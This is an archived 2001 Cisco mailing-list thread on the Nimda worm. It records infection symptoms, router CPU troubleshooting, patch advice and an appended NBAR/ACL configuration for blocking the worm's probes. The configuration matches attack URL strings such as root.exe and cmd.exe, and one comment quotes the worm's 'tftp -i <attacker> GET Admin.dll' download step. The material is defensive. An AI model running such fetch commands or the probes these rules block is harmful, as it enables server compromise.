That's the Nimda worm.  I sent two messages to the group about it yesterday
morning, "FW: Worm probes" and "FW: Worm probes - Part II".  They included
emails sent to the NANOG newsgroup that talked about the types of problems
and impact people had been experiencing.  There are several messages there
that detail the various events the worm causes--and it seems like it does
quite a bit of really nasty stuff.

Rik, it's Cisco relevant because NBAR can be used to block the entrance of
the worm into your network...


  -- Leigh Anne

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Rik Guyler
> Sent: Wednesday, September 19, 2001 7:52 AM
> To: [EMAIL PROTECTED]
> Subject: RE: Alert: Some sort of IIS worm seems to be propagating
> [7:20388]
>
>
> I was doing battle with this beastie last night until midnight.  This one's
> very bad as it overwrites files with various ".eml" files, typically
> "readme.eml".  If you do a search on the local drives for the extension, you
> will find numerous files (over 1600 in my case last night).
>
> How does this relate to Cisco?  Well, I was originally called for a router
> problem as the Internet browsing and email transfer was very slow and of
> course the client's first thought was that there was a telco, router, DSU,
> etc. issue.  I checked the router and the console (and VTY) was VERY slow.
> I ran a "show processor cpu" and discovered the processor utilization was
> nearly 100% and was staying there, which explains why the console was so
> slow.  Upon deeper scrutiny, I found that "IP input" was the process using
> most of the processor, which indicates that IP traffic is jamming the
> router.  With this knowledge, I went after the worm, which unfortunately,
> has no simple fix, at least at this time.  When I removed the server from
> the network, the router was fine.
>
> So, all of the engineers that are so Cisco focused that a mere virus doesn't
> matter, take heed - not everything can be judged on first impressions.
>
> ---
> Rik Guyler
>
> -----Original Message-----
> From: Brad Ellis [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, September 19, 2001 2:30 AM
> To: [EMAIL PROTECTED]
> Subject: Re: Alert: Some sort of IIS worm seems to be propagating
> [7:20366]
>
>
> John Kaberna, ([EMAIL PROTECTED]), sent me the following info:
>
> "  This may be what you are experiencing:
>
> http://www.cert.org/current/current_activity.html#port80
>
>
> Make sure you patch IIS if you haven't done so already.  Check to see
> if you're already infected with Code Red and follow the instructions
> to get rid of it.
>
> http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp
>
>
> You can also use NBAR to block Red Worm if you haven't done so
> already.
>
> http://www.cisco.com/warp/customer/63/nbar_acl_codered.shtml   "
>
> -Brad Ellis
> CCIE#5796
> Network Learning Inc
> [EMAIL PROTECTED]
> used Cisco:  www.optsys.net
> "Farhan Ahmed" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED]...
> > -----Original Message-----
> > From: Simon Clausen [mailto:[EMAIL PROTECTED]]
> > Sent: Wednesday, September 19, 2001 12:49 AM
> > To: [EMAIL PROTECTED]
> > Subject: Re: Alert: Some sort of IIS worm seems to be propagating
> >
> >
> > Sent on behalf of Rich Zuris ([EMAIL PROTECTED]) due to his network
> > being taken offline by the worm.
> >
> > Following is a list of recorded changes made to NT4 SP6a with Q299444
> > rollup security patches.
> >
> > The following is appended to EVERY HTML file on the machine:
> > window.open("readme.eml", null,
> > "resizable=no,top=6000,left=6000")
> >
> > Just about every directory on the machine has one or more files with
> > extension .eml, mostly readme.eml but also other names that seem to
> > correspond to directory or other filenames.  Total of 1234 .eml files
> > created, totalling 98Mb (about 78Kb each).  Also got 55 files with
> > extension .nws, containing exact same content.  Both .eml and .nws files
> > can be opened by Outlook Express.
> >
> > Virus makes numerous outbound connections to port 80 to propagate itself
> > to other servers.
> >
> > Virus sets IE5 to IE4 compatibility mode (apparently to circumvent
> > security) and crashes Explorer.exe when IE is launched.  IExplore.exe
> > appears to be hacked, and there is now a hidden IExplore .exe (note the
> > space before the extension) in same directory.
> >
> > Virus code in stealth executable file with name tftp###, where ### is
> > any numeric string.  File has no extension, but it is definitely a
> > Windows executable.  This file is placed into \Program Files\Common
> > Files\System\MSADC, and in same directory, Admin.dll appears to be
> > hacked.
> >
> > IIS console hacked:  New MMC.EXE placed in \WINNT directory, which may
> > override original version in \WINNT\System32.
> >
> > EXE files placed into TEMP directory.  Note that most/all hacked EXE
> > files are flagged Hidden.
> >
> > Riched20.dll files placed in random directories (not on PATH, not
> > containing executables).
> >
> > NT Account "Guest" was made a member of the NT "Administrators" group!
> >
> > Regards,
> >
> > Simon Clausen
> >
> > -----Original Message-----
> > From: Windows NTBugtraq Mailing List
> > [mailto:[EMAIL PROTECTED]] On Behalf Of Russ
> > Sent: Wednesday, 19 September 2001 1:21 AM
> > To: [EMAIL PROTECTED]
> > Subject: Alert: Some sort of IIS worm seems to be propagating
> >
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >
> > There have been numerous reports of IIS attacks being generated by
> > machines over a broad range of IP addresses. These "infected" machines
> > are using a wide variety of attacks which attempt to exploit already
> > known and patched vulnerabilities against IIS.
> >
> > It appears that the attacks can come both from email and from the
> > network.
> >
> > A new worm, being called w32.nimda.amm, is being sent around. The
> > attachment is called README.EXE and comes as a MIME-type of
> > "audio/x-wav" together with some html parts. There appears to be no text
> > in this message when it is displayed by Outlook when in Auto-Preview
> > mode (always a good indication there's something not quite right with an
> > email.)
> >
> > The network attacks against IIS boxes are a wide variety of attacks.
> > Amongst them appear to be several attacks that assume the machine is
> > compromised by Code Red II (looking for ROOT.EXE in the /scripts and
> > /msadc directory, as well as an attempt to use the /c and /d virtual
> > roots to get to CMD.EXE). Further, it attempts to exploit numerous other
> > known IIS vulnerabilities.
> >
> > One thing to note is the attempt to execute TFTP.EXE to download a file
> > called ADMIN.DLL from (presumably) some previously compromised box.
> >
> > Anyone who discovers a compromised machine (a machine with ADMIN.DLL in
> > the /scripts directory), please forward me a copy of that .dll ASAP.
> >
> > Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the
> > following;
> >
> > edit %systemroot/system32/drivers/etc/services.
> >
> > change the line;
> >
> > tftp 69/udp
> >
> > to;
> >
> > tftp 0/udp
> >
> > thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows
> > File Protection so can't be removed.
> >
> > More information as it arises.
> >
> > Cheers,
> > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP Personal Privacy 6.5.2
> >
> > iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
> > Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
> > iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
> > hSW7yN2lhJc=
> > =YAwc
> > -----END PGP SIGNATURE-----
> >
> > ============================================================================
> > Delivery co-sponsored by Trend Micro, Inc.
> > ============================================================================
> > TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE
> >
> > If you are worried about email viruses, you need Trend Micro ScanMail
> > for Exchange. ScanMail is the first antivirus solution that seamlessly
> > integrates with the Microsoft Exchange 2000 virus-scanning API 2.0.
> > ScanMail ensures 100% inbound and outbound email virus scanning and
> > provides remote software management. Download a FREE 30-day trial copy
> > of ScanMail and find out why it is the best:
> > http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
> > ============================================================================




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=20405&t=20405
--------------------------------------------------
FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html
Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
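Since the thread's Cisco angle is NBAR, here is an added example of the kind of
IOS configuration the Cisco link above describes for Code Red, extended with the
URL strings this thread associates with Nimda (root.exe, cmd.exe, readme.eml)
and with an ACL for the worm's TFTP fetch.  This is not code from the thread or
from Cisco's page; the interface names, access-list numbers and the DSCP value
used as a marker are assumptions to adapt to your own router.

```cisco
! Added example, not from this thread or Cisco's NBAR page.
! Assumes an IOS release with NBAR (12.1(5)T or later); NBAR needs CEF.
ip cef
!
! Classify HTTP requests whose URL carries the probe strings from the thread:
!  *.ida*       Code Red's .ida overflow
!  *root.exe*   Code Red II backdoor in /scripts and /msadc, which Nimda reuses
!  *cmd.exe*    the /c and /d virtual-root paths to CMD.EXE
!  *readme.eml* the file Nimda serves to browsers via the injected window.open()
class-map match-any nimda-probes
 match protocol http url "*.ida*"
 match protocol http url "*root.exe*"
 match protocol http url "*cmd.exe*"
 match protocol http url "*readme.eml*"
!
! Mark matching packets with an otherwise unused DSCP value (assumed: 1).
policy-map mark-nimda-probes
 class nimda-probes
  set ip dscp 1
!
! Assumed interface names: Serial0/0 faces the Internet, FastEthernet0/0 the
! server LAN.  Mark on the way in, drop on the way out toward the servers.
interface Serial0/0
 service-policy input mark-nimda-probes
!
interface FastEthernet0/0
 ip access-group 105 out
 ip access-group 106 in
!
access-list 105 deny   ip any any dscp 1 log
access-list 105 permit ip any any
!
! The worm's "tftp -i <attacker> GET Admin.dll" step is an outbound UDP/69
! request from the victim, so deny TFTP leaving the server LAN.
access-list 106 deny   udp any any eq tftp log
access-list 106 permit ip any any
```

Two caveats from the thread itself.  NBAR inspection costs CPU, so on a router
that is already pinned at 100% in "IP input" the way Rik describes, make sure
CEF is on (process-switched traffic is what drives that process) and watch
"show processes cpu" after applying the policy.  And the "log" keyword on the
deny lines, together with "show access-lists", only tells you how many probes
the router is eating; it does nothing for a server that is already infected,
which still needs to be pulled off the network, cleaned and patched per the
MS01-044 link above.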
